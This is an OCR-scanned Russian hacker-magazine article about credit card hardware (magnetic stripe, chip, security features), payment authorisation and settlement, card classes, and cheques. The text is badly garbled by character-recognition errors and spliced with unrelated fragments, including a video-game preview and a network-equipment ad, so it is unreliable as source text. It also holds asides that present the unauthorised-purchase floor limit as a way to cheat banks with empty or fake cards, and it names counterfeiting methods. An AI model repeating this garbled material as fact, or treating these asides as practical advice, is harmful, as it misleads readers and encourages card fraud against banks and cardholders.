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ЖЕЛЕЗО КРЕДИТОК \ 


Федор "5р1КЗ" Галков (fallout@pisem.net) 


ЖЕЛЕЗО 
КРЕДИТОК 


РАССМАТРИВАЕМ КАРТЫ СО ВСЕХ СТОРОН 


редитки уже давно вошли в нашу повседневную жизнь окончательно и 

бесповоротно. Многие с их появлением почти забыли про наличные. Конеч- 
но, на это повлияло множество сопутствующих факторов: практичность, удоб- 
ство, распространенность и относительная безопасность. 


о сегодня мы рассмотрим креды 
не с привычной - электронной - 
стороны, а с несколько другой - 
что это за кусок пластика и ка- 
ким образом он работает. 


ИСТОРИЯ 

Самые первые кредитки появились около 
ста лет назад (в США - где же еще), тогда 
они использовались исключительно в мага- 
зинах, ресторанах и отелях для обслужива- 
ния респектабельных постоянных клиентов, и 
ни о каком серийном производстве не было и 
речи. Карточки, по сути, пришли на смену оп- 
латы в рассрочку. В те далекие времена кре- 
ды были сделаны из толстого картона, затем 
появились металлические карточки (уже эм- 
боссированные), и только потом, после gnu- 
тельных экспериментов с различными пласт- 
массами, появились пластиковые карты. 
Первой фирмой, занимающейся серийным 
выпуском кредиток (для ресторанного бизне- 
са) стала Dinners Club (с 1949 года). Тогда 
впервые ‹фирма-производитель кред работа- 
ла посредником между покупателем и про- 
давцом. Также Dinners Club попыталась соз- 
дать универсальную карту (между прочим - 
срирма жива до сих пор). Затем производ- 
ством кред занялась American Express (круп- 
нейший производитель дорожных чеков), 
Bank of America и Chase Manhattan Bank (два 
крупнейших банка страны). В 1966 году Bank 
Of America совершил серьезный прорыв, поз- 
волив другим банкам проводить операции с 
их фирменными кредитками BankAmericard. 
За короткий срок эта платежная система по- 
лучила национальный масштаб, затем в стра- 
не организовалась вторая подобная система - 
Interbank Cards Association. 
В скором времени пластиковые карты стали 
международным стандартом, количество 
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пользователей измерялось десятками мил- 
лионов. В 1976 году Americard сменила имя 
Ha Visa (для выхода на мировую арену), а в 
1980 году MasterCharge - на MasterCard. За 
несколько лет эти платежные системы стали 
крупнейшими в мире (в банковской среде) и 
не собираются сдавать позиции. Кстати, эти 
две системы долгое время противостояли 
друг другу, запрещали банкам одновременно 
выдавать обе карты, но это было раньше. Со- 
вершенствование кред продолжается gO сих 
пор, следующим этапом эволюции планиру- 
ется практически полный переход на смарт- 
карты, что добавит множество плюсов (в 
первую очередь - серьезную защиту, постро- 
енную на криптограсфических алгоритмах), 
но об этом я расскажу ниже. 


СТАНДАРТ 

и Введение мирового стандарта послужило 
решающим сфактором для всеобщего приз- 
нания. На сегодня существуют кредитки 
только одного стандарта - 10-1, другие просто 
(пока или уже) не используются. Этот стан- 
дарт определяет все до сотой допи милли- 
метра, каждый элемент креды должен нахо- 
диться точно на своем месте и в полной мере 
выполнять возложенную на него сфрункцию. 
Естественно, по этому мировому стандарту и 
производится абсолютно все обслуживаю- 
щее оборудование (импринтеры, электрон- 
ные терминалы, банкоматы). Производите- 
лям пластиковых карточек позволено только 
экспериментировать с дизайном карточек, да 
и то в очень строгих рамках. 

Все кредитки можно разделить на несколько 
классов: 

Ф. Чиповые карты (смарт-карты) - кредитки 
со встроенной микросхемой или памятью 
(4unoM). 

@. Эмбоссированные карты - кредитки, 
часть текста на которых печатается методом 
тиснения или термопечати. Эмбоссированный 
текст необходим для печати оттисков на че- 
ках, но такое используется в основном в США 
и для визуального распознавания текста. 

9. Магнитные карты - креды с магнитной 
полосой. 

Такое разделение крайне условно, так как в 
большинстве кред эти характеристики соче- 
таются (иногда одновременно все три). 
Кредитка состоит из нескольких отдельных 
функциональных элементов, о которых я ни- 
же расскажу подробнее: кусок пластика (с 


эмбоссированным текстом), магнитная 
полоса, микросхема или память (чип) 
и некоторые другие менее значимые 
элементы. 


ОСНОВА 

m Сама карточка сделана из куска 
особого пластика размером 
85,6х53,98х0,76 мм. Пластик произво- 
дится по сложной технопогии, окра- 
шивается, на заготовку наносятся 
обязательные общие данные про эми- 
тент и платежную ассоциацию, а так- 
же - памятка владельцу, контактная 
инфа производителя и фотография 
владельца. После этого креда ламини- 
руется, затем (по необходимости) на 
ней эмбоссируются или выжигаются 
лазером необходимые идентификаци- 
онные данные (номер карты, имя вла- 
дельца, срок действия), встраивается 
чип или магнитная полоса. При произ- 
водстве особое внимание уделяется 
безопасности во время персонализа- 
ции карточки (нанесение идентисфика- 
ционных данных владельца и про- 
шивка памяти микросхемы (энко- 
QUHTr)). Также все этапы производства 
креды находятся под пристальным 
контролем качества - брак должен мо- 
ментально отсеиваться, а карта долж- 
на удовлетворять множеству между- 
народных требований, в том числе - 
выдерживать нагрев до определен- 
ных температур, сопротивляться оп- 
ределенным механическим воздей- 
ствиям и многое другое (все по тому 
же стандарту). 


МАГНИТНАЯ ПОЛОСА 

m Магнитная полоса располагается 
на реверсе креды, в верхней части, 
недалеко от верхнего края. Внешне 
она ничего интересного собой не 
представляет - черная или коричне- 
вая полоса во всю длину карты. Поло- 
са состоит из нескольких магнитных 
дорожек (чаще всего - 3). Ширина ее 
составляет от 10,1 go 10,3 мм (если на 
креде 3 дорожки). Каждая дорожка 
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Кредитка: вид снизу 


отвечает за хранение своей собствен- 
ной информации, при этом на каждой 
дорожке могут располагаться макси- 
MyM 107 символов (цифровых или бук- 
венных). 

1 дорожка содержит основную инофу: 
идентификационный номер, общую 
информацию о владельце, сведения 
про эмитент, срок действия карты и 
немного служебной информации. 

2 дорожка отвечает за авторизацию 
карточки (полностью определяет, какие 
операции и на какую сумму ты можешь 
производить с кредой), а также дубли- 
рует часть инфы с первой дорожки. 

3 дорожка используется в основном 
при работе с банкоматом (иногда ее 
может и не быть - тогда магнитная по- 
лоса будет уже). Первые две дорожки 
только для чтения, третья - также и 
для записи (на ней, например, банко- 
мат делает отметки о снятии денег). 
Для защиты магнитной полосы от 
подделок существуют специальные 
проверочные коды CVV (Card 
Verification Value) для Visa и CVC 
(Card Verification Code) gna Europay, 
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Кредитная карта: вид сверху 
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m Чип - самый высокотехнологич- 
ный элемент креды, и, естественно, 
этот вид карт стал применяться срав- 
нительно недавно. Можно с уверен- 
ностью сказать, что за смарт-картами 
будущее (вернее, уже и настоящее). 
У чиповых карт множество преиму- 
ществ перед другими и лишь один не- 
достаток. Первый плюс - надежное хра- 
нение информации. А это - один из оп- 
ределяющих сфакторов в финансовых 
операциях (деньги ведь никто не хочет 
терять). Хотя, как ты знаешь, непроби- 
ваемой защиты не существует. Потом, 
если в карточке используется микрос- 
хема, то креда может сама принять ре- 
шение о правомерности выполняемой 
сделки. К недостаткам можно отнести, 
разве что, сравнительно высокую сто- 
имость производства карты. 
Чиповые карты делятся на карты с па- 
мятью и карты с микросхемой. 
Больше всего сейчас распространены 
креды с памятью (это самый простой 
вариант чиповой карты). 
Для хранения инфы используется 
EEPROM (electrically erasable program- 
mable read-only memory - электрически 
стираемая программируемая память 
только для чтения). Для обеспечения 
безопасности финансовых операций, 
вся память разделена на несколько 
зон, каждая из которых защищена от- 
дельно (каждая своим ключом, одна из 
них - твоим р-кодом). Считыванием 
иноры и определением валидности кар- 
ты занимается терминал. » 
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Технология чиповых карт 


В 1976 году 
Americard 
сменила 
имя на Visa 
(для выхода 
на мировую 
арену), ав 
1980 году 
MasterCharg 
е - на 
MasterCard. 
За несколь- 
ко лет эти 
платежные 
системы 
стали круп- 
нейшими в 
мире (в бан- 
ковской 
среде) и не 
собираются 
сдавать по- 
зиции. 


На сегодня 
существуют 
кредитки 
только од- 
ного стан- 
дарта - ID- 
1, другие 
просто (по- 
ка или уже) 
не исполь- 
зуются. 
Этот стан- 
дарт опре- 
деляет все 
до сотой 
доли милли- 
метра, каж- 
дый эле- 
мент креды 
должен на- 
ходиться 
точно на 
своем месте 
и в полной 
мере вы- 
полнять 
возложен- 
ную на него 
функцию. 


При произ- 
водстве 
особое вни- 


мание уде- 
ляется бе- 
зопасности 
на этапе 
персонали- 
зации кар- 
точки (на- 
несение 
идентифи- 
кационных 
данных вла- 
дельца и 
прошивка 
памяти мик- 
росхемы 
(энкодинг)). 


К защит- 
ным меха- 
низмам кре- 
ды относят- 
ся: голог- 
рамма, по- 
лоса для 
подписи, 
фотография 
владельца и 
микрош- 
рифт. 


ЖЕЛЕЗО КРЕДИТОК \ 


= er eed Hien Berea 1 —=-— 


Карты с микросхемой устроены значи- 
тельно сложнее, и, соответственно, 
стоимость их производства намного 
выше. В кредах применяется 8-раз- 
рядный проц, а также имеется посто- 
янная (ROM) и оперативная (RAM) па- 
мять. Для хранения информации ис- 
пользуется все тот же ЕЕРКОМ. Рабо- 
чий сосфт (некое подобие операцион- 
ки) прошит жестко и перезаписи не 
подлежит. Аппаратная криптограсдри- 
ческая защита построена обычно на 
алгоритмах RSA (Rivest-Shamir- 
Adleman) unu DES (Data Encryption 
Standard) - про них ты наверняка MHO- 
го раз читал в Хакере. 

Конечно, никаких элементов питания 
на карте не предусмотрено, поэтому 
креда "включается" только тогда, ког- 
ga на нее терминалом подается рабо- 
чее напряжение (через контакты чипа). 
Одним из бонусов креды с микросхемой 
является электронный кошелек. Он ре- 
ализован аппаратно и представляет со- 
бой особый срайл в памяти, содержа- 
щий сведения о количестве средств на 
счете. Для доступа к кошельку необхо- 
димо знать рт-код. При добавлении 
или списании средств со счета, соответ- 
ственно изменяется срайл. 

Для большинства чиповых кред ис- 
пользуется спецификация EMV, раз- 
работанная крупнейшими платежными 
системами: Europay, MasterCard и Visa. 
При всем этом, кредитка может вы- 
полнять и дополнительные функции. 
Например - играть роль бесконтактно- 
го проездного в метро (кстати, такие 
креды иногда выдают студентам даже 
в наших вузах). 

В последние время стали продвигать- 
ся всевозможные проекты девайсов 
для бесконтактного использования 
контактных кред (например, при помо- 


щи Bluetooth). Т.е. ты вставляешь кре- 
дитку в небольшой переходник и при 
оплате карточку доставать уже не нуж- 
но. Переходник сам обменяется всеми 
необходимыми данными с электрон- 
ным терминалом. Так как все данные 
передаются по радиоканалу, то нет ни- 
какой гарантии, что их никто не перех- 
ватит. Поэтому весь трасрик шифрует- 
ся (при помощи ключей, которые пере- 
даются только на этапе персонализа- 
ции карточки). Это, конечно, выглядит 
довольно ненадежно, но что подела- 
ешь - всем хочется удобства. 


ЩИТ И МЕЧ 

и Физическая (иногда ее еще назы- 
вают полиграфической) защита кре- 
дитки состоит из нескольких частей. К 
ней относятся, например: голограмма, 
полоса аля подписи, фотография 
владельца, скрытые рисунки/надписи 
и микрошрисрт. Давай остановимся на 
этом поподробнее. 
Голограмма. Голограмма производится 
из нескольких соединенных слоев 
фольги, нередко на нее еще и эмбосси- 
руется часть текста, что затрудняет по- 
пытки изготовить подделку креды. К 
примеру, на голограмме Визы изобра- 
жен голубь, который вращает головой 
и машет крыльями, на MactepKapge - 
красочный глобус и карта мира. Долгое 
время точно подделать голограмму не 
могли, сейчас и это - уже не проблема. 


Полоса для подписи. Полоса для под- 
писи расположена на реверсе креды. 
Фоном полоски служит асимметрич- 
ный и/или сложный рисунок, она из- 
готовлена из соответствующего мате- 
риала, препятствующего стиранию и 
смыванию подписи. Необходимо, что- 
бы подпись полностью соответство- 
вала подписи на документе, удостове- 
ряющем личность владельца. В неко- 
торых случаях на полосе еще выжига- 
ется лазером номер карты. 


Фотоградия владельца. Также распо- 
ложена на реверсе. Фотка - самый 
простой способ проверить, являешь- 
ся ли ты владельцем. 


Скрытые рисунки/надписи. Обычно на 
карточку наносятся специальными 
красками скрытые рисунки, невиди- 
мые невооруженным глазом. Такие 
рисунки видны либо в ультрафиоле- 
те, либо через специальные фильтры. 


Микрошрисрт. Печать микрошрисфтом 
- еще один вид защиты. Текст, напеча- 
танный микрошрисфтом, практически 
неразличим невооруженным глазом - 
высота каждой буквы около 1/5 мм. 
Например, на карточке Visa Electron 
текст, напечатанный микрошрисртом, 
находится по периметру логотипов 
Visa и Electron. 


Защита кредиток усложняется по Me- 
ре их распространения. Производите- 
ли придумывают все новые виды за- 


щиты, и они все постепенно обходят- 
ся. С масштабным введением нового 
вида карт возникает много сложнос- 
тей, учитывая, сколько миллионов че- 
ловек сейчас пользуются кредитками 
(у всех надо кредитки изъять и вы- 
дать новые). Сейчас полиграфичес- 
кая защита переживает определен- 
ный кризис, рынок подделок принима- 
ет критические размеры, банки терпят 
от кардерства большие убытки. Един- 
ственной надеждой остается переход 
на смарт-карты с аппаратной реализа- 
цией криптограсфической защиты. 


КАК НАС ПОДДЕЛЫВАЮТ 

m Несмотря на столь серьезную за- 
щиту, подделок очень много. Многие 
фальшивки делаются буквально на 
коленке, и их качество оставляет же- 
лать пучшего, но встречаются и прак- 
тически неотличимые от настоящих. 


Так ловят кардеров 


Кстати, по количеству подделок Рос- 
сия - признанный лидер. 

Самый распространенный и самый ка- 
чественный вид подделок - так называ- 
емый "белый пластик". Используется 
он так: данные о владельце карты на- 
носятся на девственно чистые креды 
(болванки). Иногда номера на карточке 
перебиваются (срезаются/наклеивают- 
ся) и такой метод из-за своей популяр- 
ности даже получил название shave & 
paste (срезать и наклеить). Понятно, 
что все подобные действия уголовно 
наказуемы (срок могут дать немалый). 


THE END 

и Как видишь, Kpega - это не просто 
пластмассовая пластинка. Кредитки 
постоянно совершенствуются (уже сей- 
час креда напоминает миниатюрный 
компьютер), производители объединя- 
ют усилия для борьбы с подделками. 
Чем все это закончится - посмотрим, но 


кредитки были, есть и будут. 
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МЕХАНИЗМ РАБОТЫ ПЛАТЕЖНЫХ СИСТЕМ 
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МЕХАНИЗМ ОПЛАТЫ 


m Почти любая cpu- 


нансовая операция при 


использовании кредцит- 


Сумма, на 
которую 
запрашива- 
лась авто- 
ризация, на 
твоем счету 
заморажи- 
вается, да- 
же если ты 
воруг пере- 
думаешь 
делать по- 
купку. По 
завершении 
авториза- 
ции и через 
небольшой 
промежуток 
времени 
банк прис- 
тупает к 
переводу 
средств на 
счет про- 
давца. 


ки начинается с авто- 
ризации. Во время этого этапа необ- 
ходимо определить, есть ли у тебя на 
счете необходимые средства и мо- 
жешь ли ты ими воспользоваться. Ав- 
торизация может проводиться любым 
доступным способом. Решение об ав- 
торизации может принять сама карта 
(в случае карты с микросхемой) - это 
метод называется Off-line, т.е. связы- 
ваться ни с кем не надо. В противном 
случае необходимо запросить подтве- 
рждение у банка: запрос отправляет- 
ся в первую очередь эквайреру (в 
процессинговый центр), затем пере- 
сылается эмитенту, который принима- 
ет решение, ответ перенаправляется 
снова эквайреру и только потом возв- 
ращается на место запроса (такой ме- 
TOg называется On-line). Это процесс 
может проходить через сеть, или про- 
давец может просто спросить - голо- 
сом или по сфаксу. 

Если авторизация подтверждена, то 
дальше ты можешь в полной мере 
распоряжаться зарезервированной 
суммой. Если ответ на запрос не при- 
шел, то - извини. И это еще не худший 
вариант - в ответ может прийти при- 
каз продавцу изьять у тебя карту 
(например, если они числится поте- 
рянной или украденной). Поэтому ав- 
торизация является ключевым этапом 
сделки. В редких случаях авториза- 
ции может и не быть, подробнее об 
этом ниже. 

Сумма, на которую запрашивалась 
авторизация, на твоем счету замора- 
живается, даже если ты вдруг переду- 
маешь делать покупку. По заверше- 
нии авторизации и через небольшой 
промежуток времени банк приступает 
к переводу средств на счет продавца. 
То есть - ты уже ушел из магазина, 
забрав покупки, а продавец все еще 
ждет свои деньги. Для начала эми- 
тент отправляет запрос на перевод 
зарезервированных средств расчет- 
ному банку, который доставит их счет 
эквайрера, который уже, в свою оче- 
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редь, перенаправит их туда, где ты со- 
вершил покупку. За перевод средств 
эквайрер оставит себе небольшой 
процент от суммы, за срочность про- 
цент будет больше. В общей сложнос- 
ти продавцу придется ждать денег от 
нескольких часов до нескольких 
дней. За это многие магазины не лю- 
OAT обслуживать креды. 

Вся совокупность финансовых опера- 
ций по кредам от начала до конца Ha- 
зывается взаимообменом (или inter- 
change). 


ЧТО HAM МОЖЕТ ДАТЬ БАНК 

m С банковской точки зрения креды 
можно разделить на три основных 
класса. Это важно, так как этим опре- 
деляется, каким образом ты сможешь 
распоряжаться своими деньгами или 
брать в кредит. 

©. Дебетовые (расчетные) карты - 
ты можешь использовать только те 
средства, которые досрочно положил 
на свой счет. Такую креду получить 
проще всего, и стоит она дешевле ос- 
тальных (иногда их даже выдают 
бесплатно). Никакой кредит или пере- 
расход средств по расчетной карте не 
предусмотрен. Кстати, дебетовые кар- 
ты являются самыми распространен- 
НЫМИ. 

@. Кредитные карты - служат для 
получения определенного (заранее 
оговоренного) кредита под опреде- 
ленный процент на определенный 
срок. К сожалению, процент довольно 
велик - от 10 go 40% годовых для Рос- 
сии. На счет карты деньги вносить не 
нужно. Соответственно, чем больший 
кредит дается по карте, тем ее слож- 
нее получить и тем она элитнее (сум- 
ма кредита может доходить до нес- 
кольких десятков тысяч баксов). Для 
заключения контракта необходимо, 
помимо основных документов, предс- 
тавить справку о твоих ежемесячных 
доходах. 

9. Овердрасфтные карты (почти то 
же самое, что кредитно-дебетовая 
карта) - расчетные карты с кредитным 
лимитом. Можно класть деньги на 
счет и выполнять определенный пе- 
pepacxog. Кредит дается обычно на 


срок от одного до трех месяцев, но 
чем дольше у тебя остается долг, тем 
больший ты должен будешь выпла- 
тить процент. ИМХО, такие карты са- 
мые удобные. 


нп 


Предлагаемые виды кредиток 


По привычке и дебетовые, и овердра- 
QPTHbIe, и кредитные карты называют 
просто кредитными (кредитками/кре- 
дами), что, как видишь, не совсем вер- 
HO. 

Кстати, самую первую свою кредитку 
можно приобрести уже с 14 лет. 


В принципе, продавцу/банкомату аб- 
солютно неважно, по какой карте ты 
расплачиваешься (твои это средства 
или кредит), они даже не знают, 
сколько денег у тебя на счету. Но в 
некоторых местах дебетовые креды 
не принимают, в отличие от кредит- 
ных или кредитно-дебетовых (в чем 
одно из их преимуществ). 

Кстати, по кредитным или овердрасрт- 
ным картам очень часто кидают банк. 
Порой банку практически невозмож- 
но законно вернуть себе весь кредит 
даже через суд, если клиент отказы- 
вается возвращать деньги (тут, по ре- 
шению суда, они могут только вычи- 
тать некоторый процент из офици- 
альной (!) зарплаты должника). Поэто- 
му в России долгое время рядовым 
клиентам предоставлялись исключи- 
тельно дебетовые карты (даже если 
карта была кредитной по onpegene- 
нию). Лишь в последние несколько 
лет стало реальным купить полноцен- 
ную кредитную карту. 


Еще очень важную роль играет такой 
показатель, как лимит суммы, на кото- 
рую ты можешь совершить покупку 
без авторизации (наличие средств на 
креде не проверяется, а банку-эмитен- 
TY просто направляется платежное 
поручение на данную сумму). К сожа- 
лению, такая сумма сравнительно ма- 
ла (около $50). Вот еще один из спо- 
собов обуть банк, можно даже по пус- 
той или левой Kpege. Хотя, по боль- 
шому счету, банку твои 50 баксов как 
капля в море (сильно ты их не рас- 
строишь). В России такая система ма- 
ло распространена, а жаль. 


ПЛАТЕЖНЫЕ СИСТЕМЫ 
Всевозможных платежных систем 
в мире несчетное количество - в каж- 
дой стране своя и чаще всего не одна, 
есть также и международные систе- 
мы. Кстати, к платежным системам OT- 
носятся не только банковские, но еще 
и системы путешествий и развлече- 
ний - так называемые Т&Е (Travel & 
Entertainment), например, American 


Express и Dinners Club. Из междуна- 
родных систем выделяются всего нес- 
колько крупнейших: Visa, 
Eurocard/MasterCard, American 
Express (AmEx) & Dinners Club 
International (DCI). Также можно отме- 
тить самые масштабные системы в 
России: Union Card, STB и Золотая ко- 
рона (правда, преимущества этих сис- 
тем очень сомнительны из-за их ма- 
лой распространенности). Кстати, в 
России, в отличие от других стран, для 
того, чтобы стать эмитентом, необхо- 
дима специальная лицензия Центро- 
банка. 

Бесспорно, самая популярная систе- 
ма в мире - Visa. Эта система приме- 
няется примерно в 20000 банках в 
72 странах мира, про количество 
пользователей говорить не имеет 
смысла - с каждым GHEM их число не- 
уклонно растет. 

Вторая по величине система Europay 
International. Она объединяет в себе 
сразу две крупных подсистемы: 
Eurocard/MasterCard и Cirrus/Maestro. 
Теперь немного про составляющие 
платежной системы. За дфункциониро- 
вание системы отвечают несколько 
участников (точнее, видов участни- 
ков). Это эмитенты, эквайреры и рас- 
четные банки. Каждый из участников 


Кстати, к платежным системам относятся 
не только банковские, но еще и системы 
путешествий и развлечений 
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Если сказать, что игра была обласкана 
вниманием, значит не сказать ничего. 
Обширные статьи, посвященные этому 
претенциозному проекту, уже появлялись на 
страницах нашего журнала. Однако всеобщая 
истерия не смогла ослепить бравых 
журналистов «СИ»! Мы расскажем вам всю 
правду об одной из самых ожидаемых игр 
2003-го года. 


Продолжение легендарных похождений 
Повелителя Вампиров из Нозгота. Вас 
ожидает сюрприз: теперь вы одновременно 
сможете играть не только за него, но и за его 
главного противника Разиэля — что было 
немыслимо в предыдущих частых кровавого 
сериала. 


Новый D&D-npoekt, по культовой игровой 
вселенной Greyhawk, предлагающей 
изголодавшимся любителям ВРС 
потрясающее приключение в полном 
соответствии с редакцией Правил за номером 
3.5. Ждите обзор проекта от компании с 
близким каждому русскому человеку 
названием Troika Games. 


Великолепный приставочный проект 
перекочевал-таки и на РС! Самый сильный 
редакционный мелкоскоп хоподен и 
беспристрастен; от него не укроется ни одна 
мелочь. В игре «Нади десять отличий» победу 
одержала редакция «СИ», перевыполнив план 
на триста процентов! 
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Безопас- 
ность сдел- 
ки может 
обеспечи- 
ваться сле- 
дующими 
способами: 
инет-мага- 
зин не по- 
лучает тво- 
их иденти- 
фикацион- 
ный сведе- 
ний (они 
хранятся 
только у 
платежной 
подсисте- 
мы); канал 
передачи 
данных за- 
щищается 
при помощи 
SSL. 
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контракта 
необходимо, 
помимо 
основных 
документов, 
представить 
справку о 
твоих 
ежемесяч- 
ных 
доходах. 


ОПЛАТА ПОКРЕДАМ \ 


должен четко выполнять свои функ- 
ции. Эквайрер - банк, который обслу- 
живает все необходимые сфинансо- 
вые сделки по кредам. Эмитент - сама 
организация, которая выпустила кре- 
ду. Расчетные банки играют роль ре- 
гуляторов между всеми участниками 
сделки (следят за переводом денеж- 
ных средств и прочее). Нужно отме- 
тить, что за это отвечают не обяза- 
тельно разные банки - все эти функ- 
ции может выполнять один-един- 
ственный банк. 


КЛАССЫ КАРТ 

и Каждая платежная система выпус- 
кает несколько видов кред, чтобы лю- 
бой смог выбрать кредитку, нужную 
именно ему. Класс карты определяет 
почти все ее характеристики (осталь- 
ные определяет банк). Обычно выпус- 
каются креды электронного (для бан- 
коматов и терминалов), экономичного, 
стандартного и элитного класса. Чем 
дороже карта, тем больше у нее преи- 
муществ: большой лимит кредита, 
принимается в большем количестве 
мест, ты получаешь множество вся- 
ких скидок, подарков и прочего, плюс, 
конечно, великолепный сервис. 


Выбираем MasterCard 


но, отличаются они в основном боль- 
шим количеством дополнительных 
фишек у последней. Это были дебето- 
вые карточки. Visa Platinum - это уже 
овердрасфтная карта. Стоит эта карта 
соответственно названию, и получить 
ее тяжело. Но за это ты получаешь 
кредитный лимит в $20000 и просто 
немыслимое количество всяких стра- 


XOBOK, скидок и прочего и прочего. 


Visa International 


В системе Eurocard/MasterCard приме- 
няются аналогичные креды: 
Cirrus/Maestro, Mass, Gold. Все харак- 
теристики примерно те же, что Uy 
Visa. 


MasterCard 


ЭЛЕКТРОННЫЕ КАРТЫ 

m Ни оля кого не секрет, что по кре- 
диткам можно расплачиваться и в 
инете. Все бы хорошо, но тут возника- 
ет большая проблема безопасности. 


Но за это ты получаешь кредитный лимит 
в 520000 и просто немыслимое количество 
всяких страховок, скидок и прочего и прочего 


Visa предлагает на выбор кредитки 
Electron, Classic, Gold, Platinum и нес- 
колько других, более редких. Я pacno- 
ложил креды в порядке их стоимости. 
За годовое обслуживание Visa 
Electron берут примерно 5 баксов, за 
Classic - 25, а за Gold - все 100. Visa 
Electron предназначена только для 
использования в банкоматах и элект- 
ронных терминалах в магазинах. 
Classic и Gold - кредитки класса повы- 
ше, но для их использования необхо- 
димо, чтобы баланс твоего счета не 
опускался ниже определенной суммы: 
обычно $100 gna Classic и $1000 gna 
Gold (хотя иногда такое ограничение 
банками опускается). Различие между 
Classic и Gold довольно незначитель- 


Для оплаты покупки непосредственно 
в интернет-магазине приходится сооб- 
щать свои идентификационные дан- 
ные, после этого их конфиденциаль- 
ность оказывается под угрозой. Для 
того чтобы обезопасить все финансо- 
вые операции через Сеть, созданы 
специальные платежные подсистемы. 
Таких систем в инете очень много, по- 
жалуй, самая известная в России - 
WebMoney, но она не ориентируется 
на работу с кредитками, поэтому 
WebMoney я рассматривать не буду. 
Прочие популярные системы: 
CyberPlat, ASSIST, PayCash, RBS и 
ЭЛИТ. Принцип функционирования 
этих систем примерно одинаков - они 
являются посредниками между тобой, 
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CyberPlat 


банком и интернет-магазином. Конеч- 
но, за свои услуги они оставляют себе 
некоторый процент от суммы сделки, 
но зато гарантируют сохранность тво- 
их средств и конфриденциальность 
данных. Почти все эти системы обес- 
печивают работу с картами междуна- 
родных платежных систем Visa, 
Eurocard/Mastercard, American 
Express и Dinners Club, a также иногда 
обслуживают и креды российских 
платежных систем. 


Безопасность сделки может обеспе- 
чиваться следующими способами: 
инет-магазин не получает твоих 
идентификационный сведений (они 
хранятся только у платежной под- 
системы); канал передачи данных 
защищается при помощи SSL; ис- 
пользуется цифровая подпись; га- 
рантируется юридическая чистота 
обеих сторон; используются особые 
сертификаты SET; полная выписка 
счета обо всех проведенных сфинан- 
совых операциях. Такая схема удоб- 
на и продавцам, и покупателям, ко- 
торым не жалко отдать какую-то 
сумму за безопасность. Есть у таких 
систем и свои минусы: например, 
можно работать только с магази- 
ном, зарегистрированным в данной 
сети. Также иногда для работы не- 
обходимо поставить фирменную 
программу. 
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и Вот, собственно, и все, что я хотел 
рассказать про роль и функции кре- 
диток в финансовой системе. На тему 
кредиток пишут диссертации, создают 
целые порталы в Сети, пишут огром- 
ные документации. Сам понимаешь, 
весь этот материал просто невозмож- 
но было охватить, но я постарался 
описать все самое существенное и 
примечательное. 


Поставки сетевого и телекоммуни- 
кационного оборудования ведущих 
мировых производителей 
Консультации сертифицированных 
специалистов 


Гарантийное и постгарантийное 
обслуживание 

Техническая и информационная 
поддержка 

Обучение 


Авторизованный дистрибьютор ZyXEL Telecommunications Corporation 
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«ВЫ ЧЕКИ 
ПРИНИМАЕ 


"ВЫЧЕКИ ПРИНИМАЕТЕ?" ) 


ЗАЧЕМ НУЖНЫ ЧЕКИ 


ПИСЬМЕННЫЙ 


ПРИКАЗ БАНКУ 


ш Чек - это один из 


самых медленных и не- 


Причем ста- 
вить свою 
закорючку 
надо очень 
бодро и 
уверенно. 
Иначе про- 
давец мо- 
жет запо- 
дозрить не- 
ладное и 
отправить 
чек на про- 
верку. 


дорогих способов без- 
наличных расчетов. Действительно, 
комиссионный сбор банка при обнале 
чека - один из самых низких для без- 
наличных расчетов вообще. 
Существует несколько видов чеков, 
но нас интересуют два - дорожные и 
именные чеки. У них есть много об- 
щего - например, печатаются они на 
той же бумаге, что и деньги, имеют 
несколько степеней защиты, но, тем 
не менее, часто подделываются. При- 
чем подделывать их намного выгод- 
нее, чем банкноты - ведь и сумму они 
могут принести немалую. 


ДОРОЖНЫЕ ЧЕКИ - ДРУЗЬЯ 
ИНТУРИСТА 

ш Чеками этого типа пользуются в 
основном туристы, не желающие но- 
сить с собой пачку денег. По дорож- 
ному чеку деньги выдаются мгновен- 
но, без лишних разговоров и ненуж- 
ных бумаг. Например, комиссия по 
нему составляет 1% плюс разные 
сборы, а при утере чека тебе тут же 
выдадут новый в филиале компании, 
причем сделают это практически 
мгновенно. Несмотря на то, что чеки 
надо декларировать на таможне, ог- 
раничение на вывоз денег по ним от- 
сутствует. Хотя ничто не мешает тебе 
засунуть чек подальше и не драз- 
нить им таможенников :). Кроме того, 
срок его действия не ограничен - то 
есть, купив чек для одной поездки и 
не обналичив, ты можешь использо- 
вать его во время следующего от- 
пуска. Но тут есть маленький нюанс - 
поскольку чеки выдаются в разных 
валютах, лучше заранее знать, куда 


рис. Константин Комардин 


ты поедешь, иначе можно прогадать 
на разнице курсов валют. 


Расплатиться таким чеком очень 
просто. Получая его, ты ставишь на 
нем первую подпись. Когда расплачи- 
ваешься - ставишь вторую. И это все, 
правда, если ты или твой чек выгля- 


Так как ты русский, да еще и с чеком, 
то рассматривать его и подпись на нем 
будут чуть ли не под микроскопом 
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Thomas Cook. Фирма веников не вяжет 


дят подозрительно (например, неуве- 
ренная роспись), могут попросить рас- 
писаться еще раз и показать паспорт. 
Дорожным чеком можно расплатить- 
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ся и в магазине, особенно - в капиталистических странах. 
Для получения же денег с именного чека тебе придется 
пойти в банк, и только там, после большого напряга (читай 
ниже), тебе выдадут деньги. 


Наиболее распространенные чеки - America Express, 
Thomas Cook, Citicorp и VISA. 


ИМЕННЫЕ ЧЕКИ 

m Именные чеки - чеки, выписанные банком на конкрет- 
ного человека. Деньги с них можно снять только в цент- 
ральных отделениях банка, причем не каждого. Процеду- 
ра обнала выглядит так: после заполнения целой кучи бу- 
маг, чек отправляют в банк, которым он был выписан, на 
проверку: так называемое инкассо. Продлится эта проце- 
дура не меньше двух-трех недель. Когда, наконец, придет 
ответ и тебе согласятся выплатить деньги, с них еще и 
снимут очень большую комиссию (порядка двадцати двух 
процентов). 
Примером такого чека может служить чек, присылаемый 
всеми любимой компаний Spedia.net! Помнишь такого спон- 
сора, которого пытался накрутить весь рунет? Вот-вот, 
именно он высылает тебе тридцать долларов таким чеком. 


КАК ВЫГЛЯДИТ ЧЕК 

m Чек представляет собой примерно треть альбомного 
листа. На бумаге имеются водяные знаки и другие защит- 
ные фишки. 
На нем должны присутствовать такие вещи, как надпись 
"Чек", предложение уплатить указанную сумму, имя пла- 
тельщика, дата выписки чека, подпись получателя денег. 
Также должна быть указана сумма прописью и цифрами, 
причем, если цифра не совпадает с суммой, написанной 


прописью, выплачивается последняя. То есть если циф- Mnesiarypa/ Microsoft 


ример, в магазине, гостинице, ресторане и других подоб- 
ных заведениях. Правда, если ты взял какой-нибудь рари- 
тетный чек, то тебе придется идти в банк. Несмотря на то, 
